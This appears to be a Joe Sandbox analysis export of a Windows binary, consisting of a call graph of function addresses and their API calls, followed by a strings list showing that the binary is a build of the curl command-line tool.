27386->27403 27388 7ff7f8d19099 __WSAFDIsSet 27389 7ff7f8d190ac __WSAFDIsSet 27388->27389 27388->27391 27390 7ff7f8d190c9 __WSAFDIsSet 27389->27390 27389->27391 27390->27391 27391->27374 27391->27388 27391->27389 27391->27390 27393 7ff7f8d4829a 27392->27393 27394 7ff7f8d0fca7 27393->27394 27395 7ff7f8d482f0 IsProcessorFeaturePresent 27393->27395 27394->27351 27394->27370 27396 7ff7f8d48307 27395->27396 27404 7ff7f8d484e4 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 27396->27404 27398 7ff7f8d4831a 27405 7ff7f8d482b4 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 27398->27405 27401->27360 27402->27382 27403->27386 27404->27398 29528 7ff7f8d3eea0 58 API calls _cwprintf_s_l 29531 7ff7f8d018c0 23 API calls 3 library calls 29533 7ff7f8d38ab0 malloc strchr 29534 7ff7f8d3d6b0 66 API calls strchr 28595 7ff7f8d0b6b5 28596 7ff7f8d0b6d8 28595->28596 28597 7ff7f8d0b6cb 28595->28597 28598 7ff7f8d0b6e3 28596->28598 28599 7ff7f8d0b715 28596->28599 28597->28596 28606 7ff7f8d0fed8 14 API calls __scrt_fastfail 28597->28606 28607 7ff7f8d02c04 10 API calls 28598->28607 28602 7ff7f8d0b6f6 28603 7ff7f8d0b70d 28602->28603 28608 7ff7f8d02c04 10 API calls 28602->28608 28603->28599 28609 7ff7f8d02e30 25 API calls 28603->28609 28607->28602 28608->28603 29536 7ff7f8d0c07c malloc free 29538 7ff7f8d11a80 fopen fread fclose _cwprintf_s_l 29539 7ff7f8d0ba80 realloc fread realloc free free 29540 7ff7f8d2fc80 135 API calls 28085 7ff7f8d25088 28125 7ff7f8d23bb8 GetTickCount64 28085->28125 28087 7ff7f8d25199 28088 7ff7f8d2563a 28087->28088 28089 7ff7f8d251c2 28087->28089 28093 7ff7f8d251db 28087->28093 28090 7ff7f8d16714 19 API calls 28088->28090 28092 7ff7f8d16714 19 API calls 28089->28092 28090->28093 28091 7ff7f8d16714 19 API calls 28112 7ff7f8d2566c 28091->28112 28092->28093 28093->28091 28093->28112 28094 7ff7f8d25342 28127 7ff7f8d40268 44 API calls 28094->28127 28096 7ff7f8d171ac 19 API calls _cwprintf_s_l 28109 7ff7f8d25002 28096->28109 28099 7ff7f8d256dc 28100 7ff7f8d256e1 28099->28100 28111 7ff7f8d256fa 28099->28111 28131 7ff7f8d167ac 23 API calls 2 library calls 28100->28131 28101 7ff7f8d25658 28104 7ff7f8d2568a 28101->28104 28105 7ff7f8d25660 28101->28105 28130 7ff7f8d167ac 23 API calls 2 library calls 28104->28130 28107 7ff7f8d16714 19 API calls 28105->28107 28107->28112 28108 7ff7f8d256a0 28114 7ff7f8d16714 19 API calls 28108->28114 28109->28085 28109->28087 28109->28093 28109->28094 28109->28096 28109->28099 28109->28101 28109->28108 28109->28112 28113 7ff7f8d16714 19 API calls 28109->28113 28117 7ff7f8d16e14 40 API calls 28109->28117 28118 7ff7f8d16f98 28109->28118 28122 7ff7f8d28674 28109->28122 28126 7ff7f8d24f60 19 API calls 28109->28126 28128 7ff7f8d288e0 GetTickCount64 _cwprintf_s_l 28109->28128 28129 7ff7f8d33d34 40 API calls 28109->28129 28132 7ff7f8d167ac 23 API calls 2 library calls 28111->28132 28113->28109 28114->28112 28117->28109 28119 7ff7f8d16fd0 28118->28119 28120 7ff7f8d1702b _cwprintf_s_l 28119->28120 28133 7ff7f8d16bc0 28119->28133 28120->28109 28146 7ff7f8d23bb8 GetTickCount64 28122->28146 28124 7ff7f8d2868d 28124->28109 28125->28109 28126->28109 28127->28109 28128->28109 28129->28109 28130->28112 28131->28112 28132->28112 28134 7ff7f8d16c75 recv 28133->28134 28137 7ff7f8d16c04 _cwprintf_s_l 28133->28137 28135 7ff7f8d16c98 WSAGetLastError 28134->28135 28143 7ff7f8d16c6b 28134->28143 28136 7ff7f8d16caf 28135->28136 28135->28143 28144 7ff7f8d12c90 34 API calls __swprintf_l 28136->28144 28138 7ff7f8d16c66 28137->28138 28141 7ff7f8d16c4e free 28137->28141 28138->28134 28138->28143 28140 7ff7f8d16cb9 28145 7ff7f8d167ac 23 API calls 2 library calls 28140->28145 28141->28138 28143->28120 28144->28140 28145->28143 28146->28124 29543 7ff7f8d07c64 66 API calls __scrt_fastfail 29544 7ff7f8d06e64 22 API calls _cwprintf_s_l 29546 7ff7f8d0bc8c 27 API calls _cwprintf_s_l 28488 7ff7f8d0fe8d 28489 7ff7f8d0fe9a 28488->28489 28491 7ff7f8d13c78 138 API calls 28488->28491 28491->28489 29547 7ff7f8d01060 35 API calls 2 library calls 29549 7ff7f8d0f890 malloc realloc 29550 7ff7f8d3b090 58 API calls 2 library calls 29552 7ff7f8d2cd96 46 API calls _cwprintf_s_l 29554 7ff7f8d01a90 11 API calls __scrt_fastfail 29556 7ff7f8d23660 36 API calls 2 library calls 28457 7ff7f8d25c69 28458 7ff7f8d25c8c 28457->28458 28459 7ff7f8d25ca9 28458->28459 28460 7ff7f8d25cc1 28458->28460 28472 7ff7f8d25e77 28458->28472 28474 7ff7f8d25838 60 API calls _cwprintf_s_l 28459->28474 28473 7ff7f8d23bb8 GetTickCount64 28460->28473 28463 7ff7f8d25cb9 28463->28460 28463->28472 28464 7ff7f8d25ccb 28465 7ff7f8d289f8 25 API calls 28464->28465 28466 7ff7f8d25dbf 28465->28466 28475 7ff7f8d2ddb4 24 API calls 28466->28475 28468 7ff7f8d25ddd 28468->28472 28476 7ff7f8d173c8 28468->28476 28473->28464 28474->28463 28475->28468 28477 7ff7f8d17413 28476->28477 28479 7ff7f8d17433 28477->28479 28483 7ff7f8d23bb8 GetTickCount64 28477->28483 28480 7ff7f8d48290 _cwprintf_s_l 8 API calls 28479->28480 28481 7ff7f8d174f0 28480->28481 28482 7ff7f8d167ac 23 API calls 2 library calls 28481->28482 28482->28472 28483->28479 28492 7ff7f8d02a80 28493 7ff7f8d02ab1 SearchPathA 28492->28493 28494 7ff7f8d02b18 28492->28494 28493->28494 28495 7ff7f8d02aea free _strdup 28493->28495 28496 7ff7f8d48290 _cwprintf_s_l 8 API calls 28494->28496 28495->28494 28497 7ff7f8d02b2a 28496->28497 27406 7ff7f8d14e3b 27407 7ff7f8d14e44 27406->27407 27418 7ff7f8d14e93 27406->27418 27408 7ff7f8d14e49 27407->27408 27412 7ff7f8d14e62 27407->27412 27423 7ff7f8d1530c 27408->27423 27455 7ff7f8d163c4 27408->27455 27412->27418 27425 7ff7f8d1645c 27412->27425 27416 7ff7f8d14e5d 27419 7ff7f8d1645c 20 API calls 27416->27419 27461 7ff7f8d289f8 27418->27461 27422 7ff7f8d152bb 27419->27422 27420 7ff7f8d14ef2 27420->27416 27495 7ff7f8d16208 27420->27495 27422->27423 27505 7ff7f8d1c3a4 27422->27505 27426 7ff7f8d14e85 27425->27426 27427 7ff7f8d1647d 27425->27427 27429 7ff7f8d139c4 27426->27429 27427->27426 27428 7ff7f8d16208 20 API calls 27427->27428 27428->27427 27430 7ff7f8d139fa 27429->27430 27431 7ff7f8d13a01 27429->27431 27430->27418 27432 7ff7f8d13a1c free 27431->27432 27433 7ff7f8d13a3c free 27432->27433 27434 7ff7f8d13a57 27433->27434 27435 7ff7f8d13a9c 27434->27435 27523 7ff7f8d28624 27434->27523 27435->27430 27528 7ff7f8d23740 27435->27528 27438 7ff7f8d13ae5 27439 7ff7f8d13af6 27438->27439 27539 7ff7f8d19564 free free free free 27438->27539 27440 7ff7f8d13b35 27439->27440 27442 7ff7f8d13b23 free 27439->27442 27443 7ff7f8d13c38 27440->27443 27447 7ff7f8d13b73 27440->27447 27442->27439 27442->27440 27444 7ff7f8d1c3a4 125 API calls 27443->27444 27445 7ff7f8d13c2d 27444->27445 27549 7ff7f8d1e2dc 27445->27549 27450 7ff7f8d13bd1 27447->27450 27540 7ff7f8d16714 27447->27540 27450->27445 27452 7ff7f8d16714 19 API calls 27450->27452 27452->27445 27453 7ff7f8d13bbc 27453->27450 27454 7ff7f8d1c3a4 125 API calls 27453->27454 27454->27450 27456 7ff7f8d163dd 27455->27456 27460 7ff7f8d16427 27455->27460 27456->27460 27584 7ff7f8d26e84 8 API calls 27456->27584 27458 7ff7f8d16411 27459 7ff7f8d16714 19 API calls 27458->27459 27458->27460 27459->27460 27460->27416 27585 7ff7f8d23bb8 GetTickCount64 27461->27585 27463 7ff7f8d28a7a 27464 7ff7f8d28cc5 27463->27464 27467 7ff7f8d28c7d 27463->27467 27468 7ff7f8d28d2f 27463->27468 27465 7ff7f8d48290 _cwprintf_s_l 8 API calls 27464->27465 27466 7ff7f8d14ecd 27465->27466 27466->27416 27494 7ff7f8d2ddb4 24 API calls 27466->27494 27467->27464 27593 7ff7f8d167ac 23 API calls 2 library calls 27467->27593 27468->27464 27469 7ff7f8d28d5b 27468->27469 27470 7ff7f8d0fadc 17 API calls 27468->27470 27474 7ff7f8d28d6e 27468->27474 27471 7ff7f8d0fadc 17 API calls 27469->27471 27470->27469 27471->27474 27472 7ff7f8d28e75 27476 7ff7f8d28ea9 27472->27476 27595 7ff7f8d28368 17 API calls __swprintf_l 27472->27595 27474->27472 27594 7ff7f8d28368 17 API calls __swprintf_l 27474->27594 27479 7ff7f8d28ed2 27476->27479 27596 7ff7f8d28368 17 API calls __swprintf_l 27476->27596 27586 7ff7f8d28470 27479->27586 27482 7ff7f8d28470 17 API calls 27483 7ff7f8d28f8b 27482->27483 27484 7ff7f8d28470 17 API calls 27483->27484 27485 7ff7f8d28f9e 27484->27485 27486 7ff7f8d28470 17 API calls 27485->27486 27487 7ff7f8d28fb1 27486->27487 27488 7ff7f8d28470 17 API calls 27487->27488 27489 7ff7f8d28fc4 27488->27489 27490 7ff7f8d28470 17 API calls 27489->27490 27491 7ff7f8d28fd8 27490->27491 27492 7ff7f8d0fadc 17 API calls 27491->27492 27493 7ff7f8d29039 fflush 27492->27493 27493->27464 27494->27420 27496 7ff7f8d163a1 27495->27496 27497 7ff7f8d1623c 27495->27497 27496->27416 27600 7ff7f8d23bb8 GetTickCount64 27497->27600 27499 7ff7f8d16245 27499->27496 27500 7ff7f8d16363 27499->27500 27601 7ff7f8d26e84 8 API calls 27499->27601 27500->27496 27602 7ff7f8d26d38 8 API calls 27500->27602 27502 7ff7f8d1634d 27502->27500 27504 7ff7f8d16714 19 API calls 27502->27504 27504->27500 27506 7ff7f8d1c574 27505->27506 27509 7ff7f8d1c3ce 27505->27509 27507 7ff7f8d48290 _cwprintf_s_l 8 API calls 27506->27507 27508 7ff7f8d1c583 27507->27508 27508->27423 27509->27506 27512 7ff7f8d1c408 27509->27512 27666 7ff7f8d19564 free free free free 27509->27666 27514 7ff7f8d1c437 _time64 27512->27514 27517 7ff7f8d1c46e 27512->27517 27513 7ff7f8d1c491 27515 7ff7f8d41ee0 7 API calls 27513->27515 27514->27517 27516 7ff7f8d1c49d 27515->27516 27518 7ff7f8d16714 19 API calls 27516->27518 27603 7ff7f8d41ee0 27517->27603 27521 7ff7f8d1c4d1 27518->27521 27522 7ff7f8d1c53f 27521->27522 27667 7ff7f8d24568 67 API calls 27521->27667 27613 7ff7f8d1bf2c 27522->27613 27524 7ff7f8d289f8 25 API calls 27523->27524 27526 7ff7f8d2863a 27524->27526 27525 7ff7f8d28662 27525->27435 27526->27525 27552 7ff7f8d0fadc 27526->27552 27529 7ff7f8d237cc free 27528->27529 27530 7ff7f8d23761 EnterCriticalSection LeaveCriticalSection 27528->27530 27529->27438 27531 7ff7f8d23788 CloseHandle 27530->27531 27532 7ff7f8d23790 27530->27532 27531->27529 27534 7ff7f8d237ae 27532->27534 27535 7ff7f8d23795 WaitForSingleObjectEx CloseHandle 27532->27535 27579 7ff7f8d23444 6 API calls 27534->27579 27535->27534 27539->27439 27541 7ff7f8d1671d 27540->27541 27546 7ff7f8d13bb4 27540->27546 27542 7ff7f8d16790 27541->27542 27580 7ff7f8d0f810 27541->27580 27544 7ff7f8d48290 _cwprintf_s_l 8 API calls 27542->27544 27544->27546 27548 7ff7f8d1c764 GetTickCount64 _cwprintf_s_l 27546->27548 27548->27453 27550 7ff7f8d1e2f9 free 27549->27550 27551 7ff7f8d1e31a free 27550->27551 27551->27430 27555 7ff7f8d0ed58 27552->27555 27556 7ff7f8d0ed77 __swprintf_l 27555->27556 27565 7ff7f8d0e790 27556->27565 27558 7ff7f8d0edca 27559 7ff7f8d48290 _cwprintf_s_l 8 API calls 27558->27559 27560 7ff7f8d0f7d6 27559->27560 27560->27525 27562 7ff7f8d0edc6 27562->27558 27563 7ff7f8d0f868 17 API calls __swprintf_l 27562->27563 27575 7ff7f8d0e724 isdigit 27562->27575 27578 7ff7f8d0e6cc __stdio_common_vsprintf pre_c_initialization 27562->27578 27563->27562 27570 7ff7f8d0ec60 27565->27570 27573 7ff7f8d0e7d1 27565->27573 27566 7ff7f8d0e821 strncmp 27567 7ff7f8d0e83b strncmp 27566->27567 27568 7ff7f8d0e88e strncmp 27566->27568 27567->27568 27567->27573 27569 7ff7f8d0e8b0 strncmp 27568->27569 27568->27573 27569->27573 27570->27562 27571 7ff7f8d0e93c strtol 27571->27573 27572 7ff7f8d0e98d strtol 27572->27573 27573->27566 27573->27568 27573->27570 27573->27571 27573->27572 27574 7ff7f8d0e724 isdigit isdigit __swprintf_l 27573->27574 27574->27573 27576 7ff7f8d0e748 isdigit 27575->27576 27577 7ff7f8d0e767 27575->27577 27576->27576 27576->27577 27577->27562 27578->27562 27581 7ff7f8d0ed58 __swprintf_l 17 API calls 27580->27581 27582 7ff7f8d0f834 27581->27582 27583 7ff7f8d171ac 19 API calls 2 library calls 27582->27583 27583->27542 27584->27458 27585->27463 27587 7ff7f8d28491 27586->27587 27591 7ff7f8d28482 27586->27591 27588 7ff7f8d284c2 27587->27588 27587->27591 27597 7ff7f8d0f868 27588->27597 27589 7ff7f8d0f868 __swprintf_l 17 API calls 27590 7ff7f8d2858f 27589->27590 27590->27482 27591->27589 27593->27464 27594->27472 27595->27476 27596->27479 27598 7ff7f8d0f810 __swprintf_l 17 API calls 27597->27598 27599 7ff7f8d0f880 27598->27599 27599->27590 27600->27499 27601->27502 27602->27496 27606 7ff7f8d41efb free 27603->27606 27607 7ff7f8d41f2f 27603->27607 27604 7ff7f8d41f6c 27668 7ff7f8d166a8 27604->27668 27606->27607 27607->27604 27611 7ff7f8d41f61 free 27607->27611 27611->27604 27612 7ff7f8d41fa5 free 27612->27513 27614 7ff7f8d1c3a1 27613->27614 27615 7ff7f8d1bf35 27613->27615 27614->27506 27616 7ff7f8d23740 13 API calls 27615->27616 27617 7ff7f8d1bf55 27616->27617 27618 7ff7f8d1bf68 27617->27618 27678 7ff7f8d24568 67 API calls 27617->27678 27620 7ff7f8d1bf7e 27618->27620 27679 7ff7f8d24568 67 API calls 27618->27679 27622 7ff7f8d1bf93 27620->27622 27623 7ff7f8d1875c closesocket 27620->27623 27624 7ff7f8d1bfa8 27622->27624 27674 7ff7f8d1875c 27622->27674 27623->27622 27626 7ff7f8d1bfbd 27624->27626 27627 7ff7f8d1875c closesocket 27624->27627 27628 7ff7f8d1bfd2 free 27626->27628 27629 7ff7f8d1875c closesocket 27626->27629 27627->27626 27631 7ff7f8d1c002 free 27628->27631 27629->27628 27632 7ff7f8d1c022 free 27631->27632 27633 7ff7f8d1c042 free 27632->27633 27634 7ff7f8d1c062 free 27633->27634 27635 7ff7f8d1c082 free 27634->27635 27636 7ff7f8d1c0a2 free 27635->27636 27637 7ff7f8d1c0c2 free 27636->27637 27638 7ff7f8d1c0e2 free 27637->27638 27639 7ff7f8d1c102 free 27638->27639 27640 7ff7f8d1c122 free 27639->27640 27641 7ff7f8d1c142 free 27640->27641 27642 7ff7f8d1c162 free 27641->27642 27643 7ff7f8d1c182 free 27642->27643 27644 7ff7f8d1c1a2 free 27643->27644 27645 7ff7f8d1c1c2 free 27644->27645 27646 7ff7f8d1c1e2 free 27645->27646 27647 7ff7f8d1c202 free 27646->27647 27648 7ff7f8d1c222 free 27647->27648 27649 7ff7f8d1c242 free 27648->27649 27650 7ff7f8d1c262 free 27649->27650 27651 7ff7f8d1c282 free 27650->27651 27652 7ff7f8d1c2a2 free 27651->27652 27653 7ff7f8d1c2c2 free 27652->27653 27654 7ff7f8d1c2e2 free 27653->27654 27655 7ff7f8d1c302 free 27654->27655 27680 7ff7f8d1becc free 27655->27680 27657 7ff7f8d1c31c 27681 7ff7f8d1becc free 27657->27681 27659 7ff7f8d1c329 27660 7ff7f8d1c355 free 27659->27660 27682 7ff7f8d23e74 6 API calls 27660->27682 27662 7ff7f8d1c371 27683 7ff7f8d23e74 6 API calls 27662->27683 27664 7ff7f8d1c37d free 27664->27614 27666->27512 27667->27522 27669 7ff7f8d166ad free 27668->27669 27670 7ff7f8d16713 free 27668->27670 27672 7ff7f8d166e3 free 27669->27672 27670->27612 27673 7ff7f8d166fe free 27672->27673 27673->27670 27675 7ff7f8d1879a closesocket 27674->27675 27677 7ff7f8d18778 27674->27677 27676 7ff7f8d187a5 27675->27676 27676->27624 27677->27675 27677->27676 27678->27618 27679->27620 27680->27657 27681->27659 27682->27662 27683->27664 29562 7ff7f8d3ca40 76 API calls 29563 7ff7f8d33a40 144 API calls 28148 7ff7f8d4864c 28168 7ff7f8d48820 28148->28168 28152 7ff7f8d48673 __scrt_acquire_startup_lock 28153 7ff7f8d48698 28152->28153 28177 7ff7f8d48bb4 7 API calls __scrt_fastfail 28152->28177 28155 7ff7f8d4869c _initterm_e 28153->28155 28159 7ff7f8d486c7 __scrt_is_nonwritable_in_current_image __scrt_release_startup_lock 28153->28159 28156 7ff7f8d486bd 28155->28156 28155->28159 28157 7ff7f8d48747 __p___argv __p___argc _get_initial_narrow_environment 28158 7ff7f8d48769 28157->28158 28174 7ff7f8d48d00 GetModuleHandleW 28158->28174 28159->28157 28160 7ff7f8d4873f _register_thread_local_exe_atexit_callback 28159->28160 28160->28157 28163 7ff7f8d4877b 28165 7ff7f8d48785 28163->28165 28166 7ff7f8d48780 _cexit 28163->28166 28164 7ff7f8d48774 exit 28164->28163 28178 7ff7f8d48a0c 9 API calls 2 library calls 28165->28178 28166->28165 28169 7ff7f8d48842 __scrt_initialize_crt 28168->28169 28179 7ff7f8d49abc 28169->28179 28171 7ff7f8d48847 __scrt_uninitialize_crt 28173 7ff7f8d48665 28171->28173 28187 7ff7f8d49af0 9 API calls 3 library calls 28171->28187 28173->28152 28176 7ff7f8d48bb4 7 API calls __scrt_fastfail 28173->28176 28175 7ff7f8d48770 28174->28175 28175->28163 28175->28164 28176->28152 28177->28153 28178->28156 28180 7ff7f8d49ac5 __vcrt_initialize_pure_virtual_call_handler __vcrt_initialize 28179->28180 28188 7ff7f8d49e04 28180->28188 28184 7ff7f8d49adc 28186 7ff7f8d49ad3 28184->28186 28195 7ff7f8d49e4c DeleteCriticalSection 28184->28195 28186->28171 28187->28173 28190 7ff7f8d49e0c 28188->28190 28191 7ff7f8d49e3d 28190->28191 28192 7ff7f8d49acf 28190->28192 28196 7ff7f8d4a16c 28190->28196 28201 7ff7f8d49e4c DeleteCriticalSection 28191->28201 28192->28186 28194 7ff7f8d49da0 9 API calls 2 library calls 28192->28194 28194->28184 28195->28186 28202 7ff7f8d49e84 28196->28202 28199 7ff7f8d4a1c3 InitializeCriticalSectionAndSpinCount 28200 7ff7f8d4a1af 28199->28200 28200->28190 28201->28192 28203 7ff7f8d49ee5 28202->28203 28205 7ff7f8d49ee0 28202->28205 28203->28199 28203->28200 28204 7ff7f8d49f14 LoadLibraryExW 28204->28205 28206 7ff7f8d49f35 GetLastError 28204->28206 28205->28203 28205->28204 28208 7ff7f8d49fc8 28205->28208 28210 7ff7f8d49fad FreeLibrary 28205->28210 28211 7ff7f8d49f59 wcsncmp 28205->28211 28206->28205 28207 7ff7f8d49fd6 GetProcAddress 28209 7ff7f8d49fe7 28207->28209 28208->28203 28208->28207 28209->28203 28210->28205 28211->28205 28212 7ff7f8d49f6f LoadLibraryExW 28211->28212 28212->28205 28498 7ff7f8d0b44e 28500 7ff7f8d0b45e _cwprintf_s_l 28498->28500 28499 7ff7f8d0b4a7 28560 7ff7f8d06a1c 19 API calls __scrt_fastfail 28499->28560 28500->28499 28523 7ff7f8d0c0e4 28500->28523 28502 7ff7f8d0b4b4 28503 7ff7f8d0b4c1 puts 28502->28503 28504 7ff7f8d0b515 28502->28504 28513 7ff7f8d0b4de 28503->28513 28517 7ff7f8d0b49d 28503->28517 28507 7ff7f8d0b523 28504->28507 28512 7ff7f8d0b52d 28504->28512 28504->28517 28562 7ff7f8d06cd4 21 API calls 28507->28562 28510 7ff7f8d0b492 28559 7ff7f8d077b0 18 API calls __swprintf_l 28510->28559 28511 7ff7f8d0b510 28511->28517 28512->28511 28563 7ff7f8d0feb4 22 API calls 28512->28563 28513->28511 28561 7ff7f8d06c80 __acrt_iob_func __stdio_common_vfprintf pre_c_initialization 28513->28561 28516 7ff7f8d0b549 puts 28518 7ff7f8d0b560 28516->28518 28519 7ff7f8d0b584 puts 28516->28519 28521 7ff7f8d0b582 28518->28521 28564 7ff7f8d06c80 __acrt_iob_func __stdio_common_vfprintf pre_c_initialization 28518->28564 28519->28521 28565 7ff7f8d0e668 free free 28521->28565 28524 7ff7f8d0c12d 28523->28524 28525 7ff7f8d0c226 28524->28525 28566 7ff7f8d070b0 28524->28566 28527 7ff7f8d0c247 fopen 28525->28527 28529 7ff7f8d0c23d __acrt_iob_func 28525->28529 28528 7ff7f8d0c257 28527->28528 28530 7ff7f8d0c60a 28528->28530 28575 7ff7f8d0c63c 12 API calls 3 library calls 28528->28575 28529->28528 28534 7ff7f8d48290 _cwprintf_s_l 8 API calls 28530->28534 28533 7ff7f8d0c21d free 28533->28525 28537 7ff7f8d0b480 28534->28537 28535 7ff7f8d0c5f2 __acrt_iob_func 28535->28530 28538 7ff7f8d0c5ff fclose 28535->28538 28536 7ff7f8d0f868 __swprintf_l 17 API calls 28539 7ff7f8d0c190 fopen 28536->28539 28537->28499 28537->28510 28538->28530 28540 7ff7f8d0c1a7 fclose 28539->28540 28541 7ff7f8d0c1b2 GetModuleFileNameA 28539->28541 28543 7ff7f8d0c218 28540->28543 28541->28533 28548 7ff7f8d0c1cb 28541->28548 28542 7ff7f8d0c291 isspace 28558 7ff7f8d0c26d 28542->28558 28543->28533 28544 7ff7f8d0c5c5 free 28576 7ff7f8d0c63c 12 API calls 3 library calls 28544->28576 28545 7ff7f8d0c2d3 isspace 28545->28558 28547 7ff7f8d0c301 isspace 28547->28558 28548->28533 28550 7ff7f8d0f868 __swprintf_l 17 API calls 28548->28550 28549 7ff7f8d0c3aa isspace 28549->28558 28550->28543 28551 7ff7f8d0c33c malloc 28552 7ff7f8d0c5e7 free 28551->28552 28556 7ff7f8d0c351 __scrt_fastfail 28551->28556 28552->28535 28553 7ff7f8d0c3c8 isspace 28553->28558 28554 7ff7f8d07774 22 API calls 28554->28558 28555 7ff7f8d0c5bc free 28555->28544 28556->28558 28557 7ff7f8d0c498 malloc 28557->28556 28558->28535 28558->28542 28558->28544 28558->28545 28558->28547 28558->28549 28558->28551 28558->28553 28558->28554 28558->28555 28558->28557 28559->28517 28560->28502 28561->28513 28562->28511 28563->28516 28564->28518 28565->28511 28577 7ff7f8d06fb8 GetEnvironmentVariableA 28566->28577 28569 7ff7f8d070fb 28569->28525 28569->28533 28569->28536 28570 7ff7f8d06fb8 11 API calls 28571 7ff7f8d070d5 28570->28571 28571->28569 28572 7ff7f8d06fb8 11 API calls 28571->28572 28573 7ff7f8d070e8 28572->28573 28573->28569 28574 7ff7f8d06fb8 11 API calls 28573->28574 28574->28569 28575->28558 28576->28558 28578 7ff7f8d0701e strchr 28577->28578 28580 7ff7f8d07050 strchr 28577->28580 28578->28580 28583 7ff7f8d07030 ExpandEnvironmentStringsA 28578->28583 28579 7ff7f8d07083 28582 7ff7f8d48290 _cwprintf_s_l 8 API calls 28579->28582 28580->28579 28581 7ff7f8d07078 _strdup 28580->28581 28581->28579 28584 7ff7f8d07096 28582->28584 28583->28580 28584->28569 28584->28570 29565 7ff7f8d12e4e 23 API calls 2 library calls 29566 7ff7f8d2cd96 143 API calls _cwprintf_s_l 29569 7ff7f8d2ac50 34 API calls 28413 7ff7f8d0fe29 28422 7ff7f8d13604 calloc 28413->28422 28417 7ff7f8d0fe56 28446 7ff7f8d137e4 21 API calls 28417->28446 28419 7ff7f8d0fe61 28447 7ff7f8d1577c 237 API calls 28419->28447 28421 7ff7f8d0fe36 28423 7ff7f8d13628 calloc 28422->28423 28424 7ff7f8d13642 28423->28424 28443 7ff7f8d0fe2e 28423->28443 28448 7ff7f8d290f0 28424->28448 28428 7ff7f8d290f0 malloc 28430 7ff7f8d136a5 28428->28430 28429 7ff7f8d13775 28455 7ff7f8d29424 free 28429->28455 28433 7ff7f8d290f0 malloc 28430->28433 28441 7ff7f8d13719 28430->28441 28432 7ff7f8d1377d 28434 7ff7f8d1378e 28432->28434 28456 7ff7f8d29424 free 28432->28456 28435 7ff7f8d136d9 28433->28435 28436 7ff7f8d19b98 237 API calls 28434->28436 28438 7ff7f8d0fb08 40 API calls 28435->28438 28440 7ff7f8d13715 28435->28440 28435->28441 28442 7ff7f8d1379a 28436->28442 28438->28440 28439 7ff7f8d1a0a0 18 API calls 28439->28441 28440->28439 28440->28441 28441->28443 28454 7ff7f8d29424 free 28441->28454 28444 7ff7f8d137c7 free 28442->28444 28443->28421 28445 7ff7f8d15e34 malloc strtol malloc 28443->28445 28444->28443 28445->28417 28446->28419 28447->28421 28449 7ff7f8d29110 28448->28449 28450 7ff7f8d13674 28448->28450 28449->28450 28451 7ff7f8d2911f malloc 28449->28451 28450->28428 28450->28441 28453 7ff7f8d2915a 28451->28453 28453->28450 28454->28429 28455->28432 28456->28434 28484 7ff7f8d1562b 28485 7ff7f8d15632 28484->28485 28487 7ff7f8d15d20 8 API calls 28485->28487 28487->28485 29574 7ff7f8d2f430 229 API calls _cwprintf_s_l 29575 7ff7f8d29630 calloc calloc 29576 7ff7f8d2f830 144 API calls _cwprintf_s_l 28590 7ff7f8d48630 28594 7ff7f8d48d54 SetUnhandledExceptionFilter 28590->28594 29577 7ff7f8d07e38 76 API calls __scrt_fastfail
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true
                                      • Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd
                                      Similarity
                                      • API ID: free$__swprintf_l$_close_filenofclose
                                      • String ID: %s%s%s$(%d) Failed writing body$-'$CURLOPT_ABSTRACT_UNIX_SOCKET$CURLOPT_CONNECT_TO$CURLOPT_DEFAULT_PROTOCOL$CURLOPT_EXPECT_100_TIMEOUT_MS$CURLOPT_FTP_ACCOUNT$CURLOPT_FTP_ALTERNATIVE_TO_USER$CURLOPT_FTP_FILEMETHOD$CURLOPT_FTP_SKIP_PASV_IP$CURLOPT_FTP_SSL_CCC$CURLOPT_FTP_USE_PRET$CURLOPT_GSSAPI_DELEGATION$CURLOPT_HEADERDATA$CURLOPT_HEADERFUNCTION$CURLOPT_HTTP_CONTENT_DECODING$CURLOPT_HTTP_TRANSFER_DECODING$CURLOPT_IGNORE_CONTENT_LENGTH$CURLOPT_LOCALPORT$CURLOPT_LOCALPORTRANGE$CURLOPT_MAIL_AUTH$CURLOPT_MAIL_FROM$CURLOPT_MAIL_RCPT$CURLOPT_PROTOCOLS$CURLOPT_PROXY_SERVICE_NAME$CURLOPT_PROXY_SSL_OPTIONS$CURLOPT_PROXY_TLSAUTH_PASSWORD$CURLOPT_PROXY_TLSAUTH_TYPE$CURLOPT_PROXY_TLSAUTH_USERNAME$CURLOPT_REDIR_PROTOCOLS$CURLOPT_RESOLVE$CURLOPT_SASL_IR$CURLOPT_SERVICE_NAME$CURLOPT_SOCKS5_AUTH$CURLOPT_SOCKS5_GSSAPI_NEC$CURLOPT_SSL_ENABLE_ALPN$CURLOPT_SSL_ENABLE_NPN$CURLOPT_SSL_OPTIONS$CURLOPT_SSL_SESSIONID_CACHE$CURLOPT_TCP_KEEPALIVE$CURLOPT_TCP_KEEPIDLE$CURLOPT_TCP_KEEPINTVL$CURLOPT_TFTP_BLKSIZE$CURLOPT_TFTP_NO_OPTIONS$CURLOPT_TLSAUTH_PASSWORD$CURLOPT_TLSAUTH_TYPE$CURLOPT_TLSAUTH_USERNAME$CURLOPT_UNIX_SOCKET_PATH$HTTPS-proxy has similar options --proxy-cacert and --proxy-insecure.$If this HTTPS server uses a certificate signed by a CA represented in the bundle, the certificate verification probably failed due to a problem with the certificate (it might be expired, or the name might not match the domain name in the URL).If you'd like$M'$Metalink: fetching (%s) from (%s) FAILED (%s)$Metalink: fetching (%s) from (%s) FAILED (HTTP status code %ld)$Metalink: fetching (%s) from (%s) OK$More details here: https://curl.haxx.se/docs/sslcerts.htmlcurl performs SSL certificate verification by default, using a "bundle" of Certificate Authority (CA) public keys (CA certs). If the default bundle file isn't adequate, you can specify an alternate $Throwing away %I64d bytes$Transient problem: %s Will retry in %ld seconds. %ld retries left.$curl: (%d) %s$curl: Saved to 